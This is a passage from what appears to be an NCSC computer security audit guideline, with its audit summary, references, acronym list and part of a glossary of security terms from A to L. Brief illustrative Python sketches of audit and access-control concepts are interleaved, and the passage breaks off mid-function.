to turn it back on.  In this case no individual would be able to
turn off the audit mechanism, compromise the system, and then
turn it back on. 
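The two-role arrangement described above can be sketched as follows.  The role names are illustrative; the point is that no single role can both disable and re-enable the audit mechanism.

```python
class AuditSwitch:
    """No single role can both disable and re-enable auditing."""
    def __init__(self):
        self.enabled = True

    def disable(self, role):
        if role != "auditor_off":
            raise PermissionError("only the disabling role may turn audit off")
        self.enabled = False

    def enable(self, role):
        if role != "auditor_on":
            raise PermissionError("only the enabling role may turn audit on")
        self.enabled = True

switch = AuditSwitch()
switch.disable("auditor_off")
try:
    switch.enable("auditor_off")   # same role cannot turn it back on
except PermissionError:
    pass
```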

8.6.2   Data Loss 

Although the audit software and hardware are reliable security  
mechanisms, they are not infallible.  They, like the rest of the 
system, are dependent upon constant supplies of power and are  
readily subject to interruption due to mechanical or power
failures.  Their failure can cause the loss or destruction of
valuable audit data.  The system security administrator should be
aware of this risk and should establish some procedure that would
ensure that the audit trail is preserved somewhere.  The system
security administrator should duplicate the audit trail on a
removable medium at certain points in time to minimize the data
loss in the event of a system failure.  The Trusted Facility
Manual should include what the possibilities and nature of loss
exposure are, and how the data may be recovered in the event that
a catastrophe does occur.  
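The duplication procedure described above can be sketched as a periodic copy of the live audit trail to removable media, so that a failure loses at most one interval of audit data. The paths, naming scheme, and use of the standard library here are assumptions for illustration, not a prescribed procedure:

```python
# Sketch: duplicate the audit trail onto a removable medium at certain
# points in time, so a mechanical or power failure loses at most one
# interval of audit data.  Paths and naming are illustrative assumptions.

import shutil
import time
from pathlib import Path

def archive_audit_trail(trail: Path, removable: Path) -> Path:
    """Copy the current audit trail to the removable medium, stamping
    each copy so that earlier archives are never overwritten."""
    stamp = time.strftime("%Y%m%d-%H%M%S")
    dest = removable / f"audit-{stamp}.log"
    shutil.copy2(trail, dest)   # copy2 preserves timestamps for later review
    return dest
```

A scheduler (or operator procedure) would invoke this at the chosen interval; the Trusted Facility Manual would document how to recover from the archived copies.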

If a mechanical or power failure occurs, the system security 
administrator should ensure that audit mechanisms still function 
properly after system recovery.  For example, any auditing
mechanism options pre-selected before the system malfunction must
still be the ones in operation after the system recovery.   


9.  AUDIT SUMMARY 

For classes C2 and above, it is required that the TCB "be able to
create, maintain, and protect from modification or unauthorized 
access or destruction an audit trail of accesses to the objects
it protects."(1)  The audit trail plays a key role in performing
damage assessment in the case of a corrupted system.   

The audit trail shall keep track of all security-relevant events 
such as the use of identification and authentication mechanisms, 
introduction of objects into a user's address space, deletion of 
objects from the system, system administrator actions, and any
other events that attempt to violate the security policy of the
system.  The option should exist that either all activities be
audited or that the system security administrator select the
events to be audited.  If it is decided that all activities
should be audited, there are overhead factors to be considered. 
The storage space needed for a total audit would generally
require more operator maintenance to prevent any loss of data and
to provide adequate protection.  A requirement exists that
authorized personnel shall be able to read all events recorded on
the audit trail.  Analysis of the total audit trail would be both
a difficult and time-consuming task for the administrator.  Thus,
a selection option is required which may be either a
pre-selection or post-selection option.   

The audit trail information should be sufficient to reconstruct a
complete sequence of security-relevant events and processes for a
system.  To do this, the audit trail shall contain the following 
information:  date and time of the event, user, type of event, 
success or failure of the event, the origin of the request, the
name of the object introduced into the user's address space,
accessed, or deleted from the storage system, and at the B1 class
and above, the sensitivity determination of the object. 
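The required fields enumerated above can be pictured as a single record type. The field names below paraphrase the text; they are not a prescribed layout:

```python
# Sketch of one audit trail record carrying the fields the guideline
# requires: date and time, user, type of event, success or failure,
# origin of the request, the name of the object involved, and (at the
# B1 class and above) the sensitivity of the object.  Field names are
# paraphrases of the text, not a prescribed format.

from dataclasses import dataclass
from typing import Optional

@dataclass
class AuditRecord:
    date_time: str                       # date and time of the event
    user: str                            # user who caused the event
    event_type: str                      # e.g., "login", "object_delete"
    success: bool                        # success or failure of the event
    origin: str                          # origin of the request, e.g., terminal ID
    object_name: Optional[str] = None    # object introduced, accessed, or deleted
    sensitivity: Optional[str] = None    # required at the B1 class and above

rec = AuditRecord("1987-06-01 09:30:00", "jones", "file_read",
                  True, "terminal-12", "/payroll/records", "SECRET")
```

A sequence of such records is sufficient to reconstruct the chain of security-relevant events the text calls for.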

It should be remembered that the audit trail shall be included in
the Trusted Computing Base and shall be accorded the same
protection as the TCB.  The audit trail shall be subject to
strict access controls. 

An effective audit trail is necessary in order to detect and 
evaluate hostile attacks on a system.    


GLOSSARY

Administrator - Any one of a group of personnel assigned to 
supervise all or a portion of an ADP system.   

Archive - To file or store records off-line. 

Audit - To conduct the independent review and examination of 
system records and activities. 

Auditor - An authorized individual with administrative duties,
whose duties include selecting the events to be audited on the
system, setting up the audit flags which enable the recording of
those events, and analyzing the trail of audit events.(2) 

Audit Mechanism - The device used to collect, review, and/or
examine system activities. 

Audit Trail - A set of records that collectively provide
documentary evidence of processing used to aid in tracing from
original transactions forward to related records and reports,
and/or backwards from records and reports to their component
source transactions.(1) 

Auditable Event - Any event that can be selected for inclusion in
the audit trail.  These events should include, in addition to 
security-relevant events, events taken to recover the system
after failure and any events that might prove to be
security-relevant at a later time.  

Authenticated User - A user who has accessed an ADP system with a
valid identifier and authentication combination.  

Automatic Data Processing (ADP) System - An assembly of computer 
hardware, firmware, and software configured for the purpose of 
classifying, sorting, calculating, computing, summarizing, 
transmitting and receiving, storing, and retrieving data with a 
minimum of human intervention.(1) 

Category - A grouping of classified or unclassified sensitive 
information, to which an additional restrictive label is applied 
(e.g., proprietary, compartmented information) to signify that 
personnel are granted access to the information only if they have
formal approval or other appropriate authorization.(4)  

Covert Channel - A communication channel that allows a process to 
transfer information in a manner that violates the system's
security policy.(1) 


Covert Storage Channel - A covert channel that involves the
direct or indirect writing of a storage location by one process
and the direct or indirect reading of the storage location by
another process.  Covert storage channels typically involve a
finite resource (e.g., sectors on a disk) that is shared by two
subjects at different security levels.(1) 

Covert Timing Channel - A covert channel in which one process 
signals information to another by modulating its own use of
system resources (e.g., CPU time) in such a way that this
manipulation affects the real response time observed by the
second process.(1) 

Flaw - An error of commission, omission or oversight in a system 
that allows protection mechanisms to be bypassed.(1) 

Object - A passive entity that contains or receives information. 
Access to an object potentially implies access to the information
it contains.  Examples of objects are:  records, blocks, pages, 
segments, files, directories, directory trees and programs, as
well as bits, bytes, words, fields, processors, video displays, 
keyboards, clocks, printers, network nodes, etc.(1) 

Post-Selection - Selection, by authorized personnel, of specified
events that had been recorded on the audit trail. 

Pre-Selection - Selection, by authorized personnel, of the
auditable events that are to be recorded on the audit trail. 

Security Level - The combination of a hierarchical classification
and a set of non-hierarchical categories that represents the 
sensitivity of information.(1) 

Security Policy - The set of laws, rules, and practices that 
regulate how an organization manages, protects, and distributes 
sensitive information.(1) 

Security-Relevant Event - Any event that attempts to change the
security state of the system (e.g., change discretionary access
controls, change the security level of the subject, change user
password, etc.).  Also, any event that attempts to violate the
security policy of the system (e.g., too many attempts to log in,
attempts to violate the mandatory access control limits of a
device, attempts to downgrade a file, etc.).(1)

Sensitive Information - Information that, as determined by a 
competent authority, must be protected because its unauthorized 
disclosure, alteration, loss, or destruction will at least cause 
perceivable damage to someone or something.(1) 


Subject - An active entity, generally in the form of a person,  
process, or device that causes information to flow among objects
or changes the system state.  Technically, a process/domain
pair.(1) 

Subject Sensitivity Level - The sensitivity level of the objects
to which the subject has both read and write access.  A subject's
sensitivity level must always be less than or equal to the
clearance of the user the subject is associated with.(4) 

System Security Administrator - The person responsible for the 
security of an Automated Information System and having the
authority to enforce the security safeguards on all others who
have access to the Automated Information System.(4)  

Trusted Computing Base (TCB) - The totality of protection
mechanisms within a computer system -- including hardware,
firmware, and software -- the combination of which is responsible
for enforcing a security policy.  A TCB consists of one or more
components that together enforce a unified security policy over a
product or system.  The ability of a TCB to correctly enforce a
security policy depends solely on the mechanisms within the TCB
and on the correct input by system administrative personnel of
parameters (e.g., a user's clearance) related to the security
policy.(1) 

User - Any person who interacts directly with a computer
system.(1) 


REFERENCES 

1.    National Computer Security Center, DoD Trusted Computer    
      System Evaluation Criteria, DoD, DoD 5200.28-STD, 1985. 

2.    Gligor, Virgil D., "Guidelines for Trusted Facility        
      Management and Audit," University of Maryland, 1985. 

3.    Brown, Leonard R., "Guidelines for Audit Log Mechanisms in 
      Secure Computer Systems," Technical Report                 
      TR-0086A(2770-29)-1, The Aerospace Corporation, 1986. 

4.    Subcommittee on Automated Information System Security,     
      Working Group #3, "Dictionary of Computer Security         
      Terminology," 23 November 1986. 

5.    National Computer Security Center, Criterion               
      Interpretation, Report No. C1-C1-02-87, 1987. 


		GLOSSARY OF COMPUTER SECURITY ACRONYMS

AIS	Automated Information System

COMPUSEC	Computer Security

COMSEC	Communications Security

CSTVRP	Computer Security Technical Vulnerability Reporting Program

DAA	Designated Approving Authority

DAC	Discretionary Access Control

DES	Data Encryption Standard

DPL	Degausser Products List

DTLS	Descriptive Top-Level Specification

EPL	Evaluated Products List

ETL	Endorsed Tools List

FTLS	Formal Top-Level Specification

ISSO	Information System Security Officer

MAC	Mandatory Access Control

NCSC	National Computer Security Center

NTISSC 	National Telecommunications and Information Systems Security 
	Committee

OPSEC	Operations Security

PPL	Preferred Products List

SAISS	Subcommittee on Automated Information Systems Security of NTISSC

SSO	System Security Officer

STS	Subcommittee on Telecommunications Security of NTISSC

TCB	Trusted Computing Base

TCSEC	DoD Trusted Computer System Evaluation Criteria

		 GLOSSARY OF COMPUTER SECURITY TERMS

*-property (or star property)

A Bell-La Padula security model rule allowing a subject write access to an
object only if the security level of the object dominates the security level
of the subject.  Also called confinement property.

-A-

acceptance inspection

	The final inspection to determine whether or not a facility or
system meets the specified technical and performance standards.  Note: This
inspection is held immediately after facility and software testing and is the
basis for commissioning or accepting the information system.

access

	A specific type of interaction between a subject and an object that
results in the flow of information from one to the other.

access control

	The process of limiting access to the resources of a system only to
authorized programs, processes, or other systems (in a network).  Synonymous
with controlled access and limited access.

access control mechanism

	Hardware or software features, operating procedures, management
procedures, and various combinations of these designed to detect and prevent
unauthorized access and to permit authorized access in an automated system.

access level

	The hierarchical portion of the security level used to identify the
sensitivity of data and the clearance or authorization of users.  Note: The
access level, in conjunction with the nonhierarchical categories, forms the
sensitivity label of an object.  See category, security level, and sensitivity
label.

access list

	A list of users, programs, and/or processes and the specifications
of access categories to which each is assigned.

access period

	A segment of time, generally expressed on a daily or weekly basis,
during which access rights prevail.

access port

	A logical or physical identifier that a computer uses to distinguish
different terminal input/output data streams.

access type

	The nature of an access right to a particular device, program, or
file (e.g., read, write, execute, append, modify, delete, or create).

accountability

	The property that enables activities on a system to be traced to
individuals who may then be held responsible for their actions.

accreditation

	A formal declaration by the DAA that the AIS is approved to operate
in a particular security mode using a prescribed set of safeguards.
Accreditation is the official management authorization for operation of an AIS
and is based on the certification process as well as other management
considerations.  The accreditation statement affixes security responsibility
with the DAA and shows that due care has been taken for security.

accreditation authority

	Synonymous with Designated Approving Authority.

add-on security

	The retrofitting of protection mechanisms, implemented by hardware
or software.

administrative security

	The management constraints and supplemental controls established to
provide an acceptable level of protection for data.  Synonymous with
procedural security.

assurance

	A measure of confidence that the security features and architecture
of an AIS accurately mediate and enforce the security policy.

attack

	The act of trying to bypass security controls on a system.  An
attack may be active, resulting in the alteration of data; or passive,
resulting in the release of data.  Note: The fact that an attack is made does
not necessarily mean that it will succeed.  The degree of success depends on
the vulnerability of the system or activity and the effectiveness of existing
countermeasures.

audit trail

	A chronological record of system activities that is sufficient to
enable the reconstruction, reviewing, and examination of the sequence of
environments and activities surrounding or leading to an operation, a
procedure, or an event in a transaction from its inception to final results.

authenticate

	(1) To verify the identity of a user, device, or other entity in a
computer system, often as a prerequisite to allowing access to resources in a
system.

	 (2) To verify the integrity of data that have been stored,
transmitted, or otherwise exposed to possible unauthorized modification.

authenticator

	The means used to confirm the identity or to verify the eligibility
of a station, originator, or individual.

authorization

	The granting of access rights to a user, program, or process.

automated data processing security

	Synonymous with automated information systems security.

automated information system (AIS)

	An assembly of computer hardware, software and/or firmware
configured to collect, create, communicate, compute, disseminate, process,
store, and/or control data or information.

automated information system security

	Measures and controls that protect an AIS against denial of service
and unauthorized (accidental or intentional) disclosure, modification, or
destruction of AISs and data.  AIS security includes consideration of all
hardware and/or software functions, characteristics and/or features;
operational procedures, accountability procedures, and access controls at the
central computer facility, remote computer, and terminal facilities;
management constraints; physical structures and devices; and personnel and
communication controls needed to provide an acceptable level of risk for the
AIS and for the data and information contained in the AIS.  It includes the
totality of security safeguards needed to provide an acceptable protection
level for an AIS and for data handled by an AIS.

automated security monitoring

	The use of automated procedures to ensure that security controls are
not circumvented.

availability of data

  	The state when data are in the place needed by the user, at the time
the user needs them, and in the form needed by the user.

-B-

back door

	Synonymous with trap door.

backup plan

	Synonymous with contingency plan.

Bell-La Padula model

	A formal state transition model of computer security policy that
describes a set of access control rules.  In this formal model, the entities
in a computer system are divided into abstract sets of subjects and objects.
The notion of a secure state is defined, and it is proven that each state
transition preserves security by moving from secure state to secure state,
thereby inductively proving that the system is secure.  A system state is
defined to be "secure" if the only permitted access modes of subjects to
objects are in accordance with a specific security policy.  In order to
determine whether or not a specific access mode is allowed, the clearance of a
subject is compared to the classification of the object, and a determination
is made as to whether the subject is authorized for the specific access mode.
See star property (*-property) and simple security property.
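Under a simple assumed representation of a security level (an integer hierarchical classification plus a set of nonhierarchical categories), the two Bell-La Padula access rules can be sketched directly: read is permitted when the subject's level dominates the object's (the simple security property), and write when the object's level dominates the subject's (the *-property). The tuple representation is an assumption made for illustration:

```python
# Sketch of the Bell-La Padula access checks.  A security level is
# modeled as (classification, categories); this representation is an
# assumption for illustration, not part of the formal model.

def dominates(s1, s2):
    """S1 dominates S2 if its hierarchical classification is greater
    than or equal to S2's and its nonhierarchical categories include
    all of S2's as a subset."""
    class1, cats1 = s1
    class2, cats2 = s2
    return class1 >= class2 and cats2 <= cats1

def may_read(subject_level, object_level):
    # simple security property: no read up
    return dominates(subject_level, object_level)

def may_write(subject_level, object_level):
    # *-property (confinement property): no write down
    return dominates(object_level, subject_level)

secret_nuclear = (2, {"NUCLEAR"})
confidential = (1, set())
```

Reading down (a high subject reading a low object) is allowed, while writing down is denied, which is what prevents a high-level subject from leaking information into low-level objects.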

benign environment

	A nonhostile environment that may be protected from external hostile
elements by physical, personnel, and procedural security countermeasures.

between-the-lines entry

	Unauthorized access obtained by tapping the temporarily inactive
terminal of a legitimate user.  See piggyback.

beyond A1

	A level of trust defined by the DoD Trusted Computer System
Evaluation Criteria (TCSEC) that is beyond the state-of-the-art technology
available at the time the criteria were developed.  It includes all the
A1-level features plus additional ones not required at the A1 level.

browsing

	The act of searching through storage to locate or acquire
information without necessarily knowing of the existence or the format of the
information being sought.

-C-

call back

	A procedure for identifying a remote terminal.  In a call back, the
host system disconnects the caller and then dials the authorized telephone
number of the remote terminal to reestablish the connection.  Synonymous with
dial back.

capability

	A protected identifier that both identifies the object and specifies
the access rights to be allowed to the accessor who possesses the capability.
In a capability-based system, access to protected objects such as files is
granted if the would-be accessor possesses a capability for the object.

category

	A restrictive label that has been applied to classified or
unclassified data as a means of increasing the protection of the data and
further restricting access to the data.

certification

	The comprehensive evaluation of the technical and nontechnical
security features of an AIS and other safeguards, made in support of the
accreditation process, that establishes the extent to which a particular
design and implementation meet a specified set of security requirements.

closed security environment

	An environment in which both of the following conditions hold true:
(1) Application developers (including maintainers) have sufficient clearances
and authorizations to provide an acceptable presumption that they have not
introduced malicious logic.  (2) Configuration control provides sufficient
assurance that applications and the equipment are protected against the
introduction of malicious logic prior to and during the operation of system
applications.

communications security (COMSEC)

	Measures taken to deny unauthorized persons information derived from
telecommunications of the U.S.  Government concerning national security, and
to ensure the authenticity of such telecommunications.  Communications security
includes cryptosecurity, transmission security, emission security, and
physical security of communications security material and information.

compartment

	A class of information that has need-to-know access controls beyond
those normally provided for access to Confidential, Secret or Top Secret
information.

compartmented security mode

	See modes of operation.

compromise

	A violation of the security policy of a system such that
unauthorized disclosure of sensitive information may have occurred.

compromising emanations

	Unintentional data-related or intelligence-bearing signals that, if
intercepted and analyzed, disclose the information transmission received,
handled, or otherwise processed by any information processing equipment.  See
TEMPEST.

computer abuse

	The misuse, alteration, disruption or destruction of data processing
resources.  The key aspect is that it is intentional and improper.

computer cryptography

	The use of a crypto-algorithm in a computer, microprocessor, or
microcomputer to perform encryption or decryption in order to protect
information or to authenticate users, sources, or information.

computer fraud

	Computer-related crimes involving deliberate misrepresentation,
alteration or disclosure of data in order to obtain something of value
(usually for monetary gain).  A computer system must have been involved in the
perpetration or coverup of the act or series of acts.  A computer system might
have been involved through improper manipulation of input data; output or
results; applications programs; data files; computer operations;
communications; or computer hardware, systems software, or firmware.

computer security (COMPUSEC)

	Synonymous with automated information systems security.

computer security subsystem

	A device designed to provide limited computer security features in a
larger system environment.

Computer Security Technical Vulnerability Reporting Program (CSTVRP)

	A program that focuses on technical vulnerabilities in commercially
available hardware, firmware and software products acquired by DoD.  CSTVRP
provides for the reporting, cataloging, and discreet dissemination of
technical vulnerability and corrective measure information to DoD components
on a need-to-know basis.

concealment system

	A method of achieving confidentiality in which sensitive information
is hidden by embedding it in irrelevant data.

confidentiality

	 The concept of holding sensitive data in confidence, limited to an
appropriate set of individuals or organizations.

configuration control

	The process of controlling modifications to the system's hardware,
firmware, software, and documentation that provides sufficient assurance that
the system is protected against the introduction of improper modifications
prior to, during, and after system implementation.  Compare configuration
management.

configuration management

	The management of security features and assurances through control
of changes made to a system's hardware, software, firmware, documentation,
test, test fixtures and test documentation throughout the development and
operational life of the system.  Compare configuration control.

confinement

	The prevention of the leaking of sensitive data from a program.

confinement channel

	Synonymous with covert channel.

confinement property

	Synonymous with star property (*-property).

contamination

	The intermixing of data at different sensitivity and need-to-know
levels.  The lower level data is said to be contaminated by the higher level
data; thus, the contaminating (higher level) data may not receive the required
level of protection.

contingency plan

	A plan for emergency response, backup operations, and post-disaster
recovery maintained by an activity as a part of its security program that will
ensure the availability of critical resources and facilitate the continuity of
operations in an emergency situation.  Synonymous with disaster plan and
emergency plan.

control zone

	The space, expressed in feet of radius, surrounding equipment
processing sensitive information, that is under sufficient physical and
technical control to preclude an unauthorized entry or compromise.

controlled access

	See access control.

controlled sharing

	The condition that exists when access control is applied to all
users and components of a system.

cost-risk analysis

	The assessment of the costs of providing data protection for a
system versus the cost of losing or compromising the data.

countermeasure

	Any action, device, procedure, technique, or other measure that
reduces the vulnerability of or threat to a system.

covert channel

	A communications channel that allows two cooperating processes to
transfer information in a manner that violates the system's security policy.
Synonymous with confinement channel.

covert storage channel

	A covert channel that involves the direct or indirect writing of a
storage location by one process and the direct or indirect reading of the
storage location by another process.  Covert storage channels typically
involve a finite resource (e.g., sectors on a disk) that is shared by two
subjects at different security levels.

covert timing channel

	A covert channel in which one process signals information to another
by modulating its own use of system resources (e.g., CPU time) in such a way
that this manipulation affects the real response time observed by the second
process.

Criteria

	See DoD Trusted Computer System Evaluation Criteria.

crypto-algorithm 

  	 A well-defined procedure or sequence of rules or steps used to
produce a key stream or cipher text from plain text and vice versa.

cryptography

  	The principles, means and methods for rendering information
unintelligible, and for restoring encrypted information to intelligible form.

cryptosecurity

 	The security or protection resulting from the proper use of
technically sound cryptosystems.

-D-

Data Encryption Standard (DES)

	A cryptographic algorithm for the protection of unclassified data,
published in Federal Information Processing Standard (FIPS) 46.  The DES,
which was approved by the National Institute of Standards and Technology, is
intended for public and government use.

data flow control

	Synonymous with  information flow control.

data integrity

	The property that data meet an a priori expectation of quality.

data security

	The protection of data from unauthorized (accidental or intentional)
modification, destruction, or disclosure.

declassification of AIS storage media

	An administrative decision or procedure to remove or reduce the
security classification of the subject media.

dedicated security mode

	See modes of operation.

default classification

	A temporary classification reflecting the highest classification
being processed in a system.  The default classification is included in the
caution statement affixed to the object.

degauss

	To reduce magnetic flux density to zero by applying a reverse
magnetizing field.

degausser

	An electrical device that can generate a magnetic field for the
purpose of degaussing magnetic storage media.

Degausser Products List (DPL)

	A list of commercially produced degaussers that meet National
Security Agency specifications.  This list is included in the NSA Information
Systems Security Products and Services Catalogue, and is available through the
Government Printing Office.

denial of service

	Any action or series of actions that prevent any part of a system
from functioning in accordance with its intended purpose.  This includes any
action that causes unauthorized destruction, modification, or delay of
service.  Synonymous with interdiction.

Descriptive Top-Level Specification (DTLS)

	A top-level specification that is written in a natural language
(e.g., English), an informal design notation, or a combination of the two.

Designated Approving Authority (DAA)

	The official who has the authority to decide on accepting the
security safeguards prescribed for an AIS or that official who may be
responsible for issuing an accreditation statement that records the decision
to accept those safeguards.

dial back

	Synonymous with  call back.

dial-up

	The service whereby a computer terminal can use the telephone to
initiate and effect communication with a computer.

disaster plan

	Synonymous with contingency plan. 

discretionary access control (DAC)

	A means of restricting access to objects based on the identity and
need-to-know of the user, process and/or groups to which they belong.  The
controls are discretionary in the sense that a subject with a certain access
permission is capable of passing that permission (perhaps indirectly) on to
any other subject.  Compare mandatory access control.
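The discretionary aspect defined above can be sketched with an access control list in which any subject holding grant authority may pass access on to any other subject. The class and right names are illustrative assumptions:

```python
# Sketch of discretionary access control: a subject with a certain
# access permission is capable of passing that permission on to any
# other subject.  The ACL representation is an illustrative assumption.

class DacObject:
    def __init__(self, owner: str):
        # the owner starts with full discretionary rights
        self.acl = {owner: {"read", "write", "grant"}}

    def check(self, subject: str, right: str) -> bool:
        return right in self.acl.get(subject, set())

    def grant(self, granter: str, grantee: str, right: str):
        # discretionary: any holder of "grant" may extend access,
        # perhaps indirectly, to any other subject
        if not self.check(granter, "grant"):
            raise PermissionError(f"{granter} may not grant access")
        self.acl.setdefault(grantee, set()).add(right)
```

This is the property mandatory access control removes: under MAC, access follows labels rather than the holder's discretion.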

DoD Trusted Computer System Evaluation Criteria (TCSEC)

	A document published by the National Computer Security Center
containing a uniform set of basic requirements and evaluation classes for
assessing degrees of assurance in the effectiveness of hardware and software
security controls built into systems.  These criteria are intended for use in
the design and evaluation of systems that will process and/or store sensitive
or classified data.  This document is Government Standard DoD 5200.28-STD and
is frequently referred to as "The Criteria" or "The Orange Book."

domain

	The unique context (e.g., access control parameters) in which a
program is operating; in effect, the set of objects that a subject has the
ability to access.  See process and subject.

dominate

	Security level S1 is said to dominate security level S2 if the
hierarchical classification of S1 is greater than or equal to that of S2 and
the nonhierarchical categories of S1 include all those of S2 as a subset.  

-E-

emanations

	See compromising emanations.

embedded system

	A system that performs or controls a function, either in whole or in
part, as an integral element of a larger system or subsystem.

emergency plan

	Synonymous with contingency plan.

emission security

	The protection resulting from all measures taken to deny
unauthorized persons information of value that might be derived from intercept
and from an analysis of compromising emanations from systems.

end-to-end encryption

	The protection of information passed in a telecommunications system
by cryptographic means, from point of origin to point of destination.

Endorsed Tools List (ETL)

	The list of formal verification tools endorsed by the NCSC for the
development of systems with high levels of trust.

Enhanced Hierarchical Development Methodology

	An integrated set of tools designed to aid in creating, analyzing,
modifying, managing, and documenting program specifications and proofs.  This
methodology includes a specification parser and typechecker, a theorem prover,
and a multi-level security checker.  Note: This methodology is not based upon
the Hierarchical Development Methodology.

entrapment

	The deliberate planting of apparent flaws in a system for the
purpose of detecting attempted penetrations.

environment

	The aggregate of external procedures, conditions, and objects that
affect the development, operation, and maintenance of a system.

erasure

	A process by which a signal recorded on magnetic media is removed.
Erasure is accomplished in two ways: (1) by alternating current erasure, by
which the information is destroyed by applying an alternating high and low
magnetic field to the media; or (2) by direct current erasure, by which the
media are saturated by applying a unidirectional magnetic field.

Evaluated Products List (EPL)

	A list of equipments, hardware, software, and/or firmware that have
been evaluated by the NCSC against the DoD TCSEC and found to be technically
compliant at a particular level of trust.  The EPL is included in the
National Security Agency Information Systems Security Products and Services
Catalogue, which is available through the Government Printing Office.

executive state

	One of several states in which a system may operate and the only one
in which certain privileged instructions may be executed.  Such instructions
cannot be executed when the system is operating in other (e.g., user) states.
Synonymous with supervisor state.

exploitable channel

	Any information channel that is usable or detectable by subjects
external to the trusted computing base whose purpose is to violate the
security policy of the system.  See covert channel.

-F-

fail safe

	Pertaining to the automatic protection of programs and/or processing
systems to maintain safety when a hardware or software failure is detected in
a system.

fail soft

	Pertaining to the selective termination of affected nonessential
processing when a hardware or software failure is detected in a system.

failure access

	An unauthorized and usually inadvertent access to data resulting
from a hardware or software failure in the system.

failure control

	The methodology used to detect and provide fail-safe or fail-soft
recovery from hardware and software failures in a system.

fault

	A condition that causes a device or system component to fail to
perform in a required manner.

fetch protection

	A system-provided restriction to prevent a program from accessing
data in another user's segment of storage.

file protection

	The aggregate of all processes and procedures in a system designed
to inhibit unauthorized access, contamination, or elimination of a file.

file security

	The means by which access to computer files is limited to authorized
users only.

flaw hypothesis methodology

	A systems analysis and penetration technique in which specifications
and documentation for the system are analyzed and then flaws in the system are
hypothesized.  The list of hypothesized flaws is then prioritized on the basis
of the estimated probability that a flaw exists and, assuming a flaw does
exist, on the ease of exploiting it, and on the extent of control or
compromise it would provide.  The prioritized list is used to direct a
penetration attack against the system.
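
The prioritization step described above can be sketched in code.  This is an
illustrative sketch only; the field names and the multiplicative scoring rule
are assumptions, not part of the methodology as defined.

```python
# Illustrative sketch of flaw hypothesis prioritization.  Each
# hypothesized flaw is scored by estimated probability of existence,
# ease of exploitation, and extent of compromise (all assumed fields),
# and the list is sorted so the most promising targets come first.

def prioritize_flaws(flaws):
    """Rank hypothesized flaws from most to least promising."""
    return sorted(
        flaws,
        key=lambda f: f["probability"] * f["ease"] * f["compromise"],
        reverse=True,
    )

hypothesized = [
    {"name": "unchecked parameter", "probability": 0.7, "ease": 0.9, "compromise": 0.8},
    {"name": "maintenance hook",    "probability": 0.2, "ease": 0.5, "compromise": 1.0},
]
ranked = prioritize_flaws(hypothesized)
```

The ranked list would then direct the order of the penetration attack.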

flow control

	See information flow control.

formal access approval

	Documented approval by a data owner to allow access to a particular
category of information.

Formal Development Methodology

	A collection of languages and tools that enforces a rigorous method
of verification.  This methodology uses the Ina Jo specification language for
successive stages of system development, including identification and modeling
of requirements, high-level design, and program design.

formal proof

	A complete and convincing mathematical argument, presenting the full
logical justification for each proof step, for the truth of a theorem or set
of theorems.

formal security policy model

	A mathematically precise statement of a security policy.  To be
adequately precise, such a model must represent the initial state of a system,
the way in which the system progresses from one state to another, and a
definition of a "secure" state of the system.  To be acceptable as a basis for
a TCB, the model must be supported by a formal proof that if the initial state
of the system satisfies the definition of a "secure" state and if all
assumptions required by the model hold, then all future states of the system
will be secure.  Some formal modeling techniques include: state transition
models, denotational semantics models, and algebraic specification models.
See Bell-La Padula model and security policy model.

Formal Top-Level Specification (FTLS)

	A top-level specification that is written in a formal mathematical
language to allow theorems showing the correspondence of the system
specification to its formal requirements to be hypothesized and formally
proven.

formal verification

	The process of using formal proofs to demonstrate the consistency
between a formal specification of a system and a formal security policy model
(design verification) or between the formal specification and its high level
program implementation (implementation verification).

front-end security filter

	A security filter, which could be implemented in hardware or
software, that is logically separated from the remainder of the system to
protect the system's integrity.

functional testing

	The segment of security testing in which the advertised security
mechanisms of the system are tested, under operational conditions, for correct
operation.

-G-

granularity

	An expression of the relative size of a data object; e.g.,
protection at the file level is considered coarse granularity, whereas
protection at field level is considered to be of a finer granularity.

guard

	A processor that provides a filter between two disparate systems
operating at different security levels or between a user terminal and a data
base to filter out data that the user is not authorized to access.

Gypsy Verification Environment

	An integrated set of tools for specifying, coding, and verifying
programs written in the Gypsy language, a language similar to Pascal which has
both specification and programming features.  This methodology includes an
editor, a specification processor, a verification condition generator, a
user-directed theorem prover, and an information flow tool.

-H-

handshaking procedure

	A dialogue between two entities (e.g., a user and a computer, a
computer and another computer, or a program and another program) for the
purpose of identifying and authenticating the entities to one another.

Hierarchical Development Methodology

	A methodology for specifying and verifying the design of programs
written in the Special specification language.  The tools for this methodology
include the Special specification processor, the Boyer-Moore theorem prover,
and the Feiertag information flow tool.

host to front-end protocol

	A set of conventions governing the format and control of data that
are passed from a host to a front-end machine.  

-I-

identification

	The process that enables recognition of an entity by a system,
generally by the use of unique machine-readable user names.

impersonating

	Synonymous with spoofing.

incomplete parameter checking

	A system design flaw that results when all parameters have not been
fully anticipated for accuracy and consistency, thus making the system
vulnerable to penetration.

individual accountability

	The ability to associate positively the identity of a user with the
time, method, and degree of access to a system.

information flow control

	A procedure to ensure that information transfers within a system are
not made from a higher security level object to an object of a lower security
level.  See covert channel, simple security property, star property
(*-property).  Synonymous with data flow control and flow control.

Information System Security Officer (ISSO)

 	The person responsible to the DAA for ensuring that security is
provided for and implemented throughout the life cycle of an AIS from the
beginning of the concept development plan through its design, development,
operation, maintenance, and secure disposal.

Information Systems Security Products and Services Catalogue

 	A catalogue issued quarterly by the National Security Agency that
incorporates the DPL, EPL, ETL, PPL and other security product and service
lists.  This catalogue is available through the U.S.  Government Printing
Office, Washington, DC 20402, (202) 783-3238.

integrity

	Sound, unimpaired or perfect condition.

interdiction

	See denial of service.

internal security controls

	Hardware, firmware, and software features within a system that
restrict access to resources (hardware, software, and data) to authorized
subjects only (persons, programs, or devices).

isolation

	The containment of subjects and objects in a system in such a way
that they are separated from one another, as well as from the protection
controls of the operating system.  

-J-

This document contains no entries beginning with the letter J.

-K-

This document contains no entries beginning with the letter K.

-L-

least privilege

	The principle that requires that each subject be granted the most
restrictive set of privileges needed for the performance of authorized tasks.
The application of this principle limits the damage that can result from
accident, error, or unauthorized use.

limited access

	Synonymous with access control.

list-oriented

	A computer protection system in which each protected object has a
list of all subjects authorized to access it.  Compare ticket-oriented.
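
A list-oriented check can be sketched as follows; the subjects and objects
shown are illustrative, not part of the definition.

```python
# Minimal sketch of a list-oriented protection system: each protected
# object carries a list of all subjects authorized to access it.
# (A ticket-oriented system would instead attach capabilities to the
# subject.)  Object and subject names are assumptions for illustration.

acl = {
    "payroll.dat": ["alice", "bob"],
    "design.doc":  ["carol"],
}

def list_oriented_check(subject, obj):
    """Grant access only if the subject appears on the object's list."""
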